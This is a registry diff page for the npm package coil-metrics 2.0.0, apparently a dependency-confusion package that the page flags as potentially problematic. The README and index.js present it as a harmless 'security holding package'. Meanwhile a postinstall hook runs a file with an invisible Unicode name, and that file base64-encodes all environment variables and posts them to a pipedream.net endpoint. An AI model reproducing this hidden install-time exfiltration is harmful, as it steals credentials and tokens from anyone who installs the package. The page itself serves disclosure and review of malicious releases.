coil-metrics 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of coil-metrics might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,2 @@
1
+ SECURITY HOLDING PACKAGE
2
+ 🏴‍☠️
package/index.js ADDED
@@ -0,0 +1,2 @@
1
+ console.log("What a confusion...! No harm done tho :) Contact me at freedfr0md3sire@wearehackerone.com")
2
+ console.log("Dep confusion... It really whips the llama's ass!")
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "coil-metrics",
3
+ "version": "2.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node ㅤ"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "request": "^2.88.2"
14
+ }
15
+ }
package//343/205/244 ADDED
@@ -0,0 +1,4 @@
1
+ const r = require('request');
2
+ const b = Buffer.from(JSON.stringify(process.env)).toString('base64')
3
+
4
+ r({url:'https://eorn6t7nifvk3e1.m.pipedream.net',method:'POST',json: true,body: b})